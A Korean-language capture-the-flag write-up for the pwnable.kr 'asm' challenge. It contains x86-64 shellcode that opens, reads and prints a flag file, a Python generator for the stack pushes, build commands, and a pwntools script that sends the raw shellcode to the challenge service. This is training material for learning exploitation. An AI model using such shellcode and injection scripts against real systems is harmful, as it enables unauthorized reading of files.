[Toddler's Bottle] asm
ssh로 접속하면 아래와 같은 파일들을 볼 수 있다.
아래 사진은 소스코드의 일부이다.
open(), read(), write()를 이용하여 플래그 파일을 읽는 쉘코드를 입력하면 된다.
; Read the flag file and echo it to stdout using nothing but the raw
; open/read/write/exit system calls.  x86-64 Linux syscall convention used
; throughout: number in rax, arguments in rdi, rsi, rdx (a fourth argument
; would go in r10, since `syscall` clobbers rcx), return value in rax.
section .text
global _start
_start:
; In 64-bit mode `push imm` pushes a full qword: 8 zero bytes that sit just
; above the path string and guarantee it is NUL-terminated.
push 0x0
; The path is pushed 8 bytes at a time, LAST chunk first, so that after the
; final push rsp points at the first character.  Every immediate is
; little-endian: the chunk's first character is its low byte.
mov rax, 0x676e6f306f306f      ; "o0o0ong" + a zero high byte (string terminator)
push rax
mov rax, 0x306f306f306f306f    ; "o0o0o0o0"
push rax
mov rax, 0x3030303030303030    ; "00000000"
push rax
mov rax, 0x303030306f6f6f6f    ; "oooo0000"
push rax
mov rax, 0x6f6f6f6f6f6f6f6f    ; "oooooooo"
push rax
mov rax, 0x6f6f6f6f6f6f6f6f    ; "oooooooo"
push rax
mov rax, 0x6f6f6f3030303030    ; "00000ooo"
push rax
mov rax, 0x3030303030303030    ; "00000000"
push rax
mov rax, 0x3030303030303030    ; "00000000"
push rax
mov rax, 0x303030306f6f6f6f    ; "oooo0000"
push rax
mov rax, 0x6f6f6f6f6f6f6f6f    ; "oooooooo" (nine identical chunks follow)
push rax
mov rax, 0x6f6f6f6f6f6f6f6f    ; "oooooooo"
push rax
mov rax, 0x6f6f6f6f6f6f6f6f    ; "oooooooo"
push rax
mov rax, 0x6f6f6f6f6f6f6f6f    ; "oooooooo"
push rax
mov rax, 0x6f6f6f6f6f6f6f6f    ; "oooooooo"
push rax
mov rax, 0x6f6f6f6f6f6f6f6f    ; "oooooooo"
push rax
mov rax, 0x6f6f6f6f6f6f6f6f    ; "oooooooo"
push rax
mov rax, 0x6f6f6f6f6f6f6f6f    ; "oooooooo"
push rax
mov rax, 0x6f6f6f6f6f6f6f6f    ; "oooooooo"
push rax
mov rax, 0x6c5f797265765f73    ; "s_very_l"
push rax
mov rax, 0x695f656d616e5f65    ; "e_name_i"
push rax
mov rax, 0x6c69665f6568745f    ; "_the_fil"
push rax
mov rax, 0x7972726f732e656c    ; "le.sorry"
push rax
mov rax, 0x69665f736968745f    ; "_this_fi"
push rax
mov rax, 0x646165725f657361    ; "ase_read"
push rax
mov rax, 0x656c705f656c6966    ; "file_ple"
push rax
mov rax, 0x5f67616c665f726b    ; "kr_flag_"
push rax
mov rax, 0x2e656c62616e7770    ; "pwnable."
push rax
mov rax, 0x5f73695f73696874    ; "this_is_" - the string's first chunk, pushed last
push rax ; push filepath - rsp now points at the start of the string
; open(path, O_RDONLY, 0)
mov rdi, rsp          ; arg0: pathname
xor rax, rax          ; overwritten by the mov below
xor rsi, rsi          ; arg1: flags = 0 = O_RDONLY
xor rdx, rdx          ; arg2: mode = 0 (only meaningful with O_CREAT)
mov rax, 0x2 ; open() - SYS_open is 2 on x86-64 Linux
syscall
; NOTE(review): the result is not checked; on failure rax holds -errno and
; that value is passed on as the fd below.
; read(fd, rsp, 0x100) - the stack area holding the path is reused as the
; buffer now that open() no longer needs it.  29*8 + 8 = 240 bytes were
; pushed above, so a 0x100-byte read also covers 16 bytes past that region.
mov rdi, rax          ; arg0: fd returned by open()
mov rsi, rsp          ; arg1: buf
mov rdx, 0x100        ; arg2: count = 256
mov rax, 0x0 ; read() - SYS_read is 0
syscall
; write(1, rsp, 0x100)
; NOTE(review): the count is the fixed 0x100 rather than the byte count that
; read() returned in rax, so whatever sits on the stack past the file's
; content is written out as well.
mov rdi, 0x1          ; arg0: fd 1 = stdout
mov rsi, rsp          ; arg1: same buffer
mov rdx, 0x100        ; arg2: count = 256
mov rax, 0x1 ; write() - SYS_write is 1
syscall
; exit(0)
xor rdi, rdi          ; status 0
mov rax, 0x3c ; exit() - SYS_exit is 60
syscall
작성한 쉘코드를 보면 open(), read(), write(), exit()을 차례로 호출하는 것을 볼 수 있다.
먼저 64비트이기 때문에
system call table을 참고하여 rax에 시스템콜 번호를 넣어준다.
인자들은 rdi, rsi, rdx, rcx에 차례로 넣어주었다.
read()와 write()의 두 번째 인자인 버퍼는 rsp로 설정하였다.
파일명은 스택에 push한 뒤, rsp를 넘겨주는 방법을 이용하였다.
파일명이 길기 때문에 python을 이용하였다.
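#!/usr/bin/env python
# Generate the NASM `mov rax, imm64` / `push rax` pairs that build the flag
# file's (very long) name on the stack.  Runs under Python 2 and 3.
l = "this_is_pwnable.kr_flag_file_please_read_this_file.sorry_the_file_name_is_very_loooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo0000000000000000000000000ooooooooooooooooooooooo000000000000o0o0o0o0o0o0ong"


def encode_pushes(name):
    """Return NASM lines that push *name*, NUL-terminated, onto the stack.

    The string is cut into 8-byte chunks from its start and padded with zero
    bytes up to a multiple of 8 (at least one, so the string is always
    terminated).  Each chunk becomes a little-endian 64-bit immediate -- the
    chunk's first character is the low byte -- and the chunks are emitted in
    reverse order because every push lowers rsp: the string's first chunk is
    pushed last and therefore ends up at the lowest address, i.e. at rsp.

    Args:
        name: the path to encode (ASCII; one byte per character).

    Returns:
        list of "mov rax, 0x...\\npush rax" strings, one per chunk, in push
        order.  An empty name still yields one all-zero chunk.
    """
    # x86-64 has no `push imm64`, so every chunk goes through rax -- including
    # the short tail, which the hand-written version emitted as a bare `push`
    # that the assembler cannot encode.  The chunk count is derived from the
    # string instead of a hand-counted offset.
    data = name + "\0"
    data += "\0" * (-len(data) % 8)
    chunks = [data[k:k + 8] for k in range(0, len(data), 8)]
    lines = []
    for chunk in reversed(chunks):
        value = sum(ord(c) << (8 * idx) for idx, c in enumerate(chunk))
        lines.append("mov rax, 0x%x\npush rax" % value)
    return lines


p = encode_pushes(l)
for line in p:
    print(line)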
이제 아래 명령어로 쉘코드를 컴파일한다.
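# The listing above is 64-bit code (rax, syscall), so it must be assembled and
# linked as x86-64; with `-f elf32` / `-m elf_i386` nasm rejects the 64-bit
# registers, and the byte string below shows REX (0x48) prefixes, i.e. it was
# produced in 64-bit mode.
nasm -f elf64 shell.s
ld -m elf_x86_64 -o shell shell.o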
#!/usr/bin/env python
# Python 2 script (print statement): connects to the challenge service, reads
# its banner, sends the assembled bytes of the listing above and hands the
# connection over to the terminal.
from pwn import *
# NOTE(review): 0.0.0.0 is not a reachable destination; presumably it stands
# in for the host the author actually connected to.
p = remote("0.0.0.0", 9026)
print p.read()  # banner/prompt the service prints before accepting input
# Raw bytes of the listing: `48 b8 <imm64>` = mov rax, imm64; `50` = push rax;
# `0f 05` = syscall.  The 29 mov/push pairs build the path, then open (rax=2),
# read (0), write (1) and exit (0x3c) follow, exactly as in the .asm source.
p.send("\x6a\x00\x48\xb8\x6f\x30\x6f\x30\x6f\x6e\x67\x00\x50\x48\xb8\x6f\x30\x6f\x30\x6f\x30\x6f\x30\x50\x48\xb8\x30\x30\x30\x30\x30\x30\x30\x30\x50\x48\xb8\x6f\x6f\x6f\x6f\x30\x30\x30\x30\x50\x48\xb8\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x50\x48\xb8\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x50\x48\xb8\x30\x30\x30\x30\x30\x6f\x6f\x6f\x50\x48\xb8\x30\x30\x30\x30\x30\x30\x30\x30\x50\x48\xb8\x30\x30\x30\x30\x30\x30\x30\x30\x50\x48\xb8\x6f\x6f\x6f\x6f\x30\x30\x30\x30\x50\x48\xb8\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x50\x48\xb8\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x50\x48\xb8\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x50\x48\xb8\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x50\x48\xb8\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x50\x48\xb8\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x50\x48\xb8\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x50\x48\xb8\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x50\x48\xb8\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x50\x48\xb8\x73\x5f\x76\x65\x72\x79\x5f\x6c\x50\x48\xb8\x65\x5f\x6e\x61\x6d\x65\x5f\x69\x50\x48\xb8\x5f\x74\x68\x65\x5f\x66\x69\x6c\x50\x48\xb8\x6c\x65\x2e\x73\x6f\x72\x72\x79\x50\x48\xb8\x5f\x74\x68\x69\x73\x5f\x66\x69\x50\x48\xb8\x61\x73\x65\x5f\x72\x65\x61\x64\x50\x48\xb8\x66\x69\x6c\x65\x5f\x70\x6c\x65\x50\x48\xb8\x6b\x72\x5f\x66\x6c\x61\x67\x5f\x50\x48\xb8\x70\x77\x6e\x61\x62\x6c\x65\x2e\x50\x48\xb8\x74\x68\x69\x73\x5f\x69\x73\x5f\x50\x48\x89\xe7\x48\x31\xc0\x48\x31\xf6\x48\x31\xd2\xb8\x02\x00\x00\x00\x0f\x05\x48\x89\xc7\x48\x89\xe6\xba\x00\x01\x00\x00\xb8\x00\x00\x00\x00\x0f\x05\xbf\x01\x00\x00\x00\x48\x89\xe6\xba\x00\x01\x00\x00\xb8\x01\x00\x00\x00\x0f\x05\x48\x31\xff\xb8\x3c\x00\x00\x00\x0f\x05")
# Hand the socket to the user so the service's output (the file content
# written by the shellcode) is shown.
p.interactive()
실행하면 아래와 같이 플래그를 얻을 수 있다.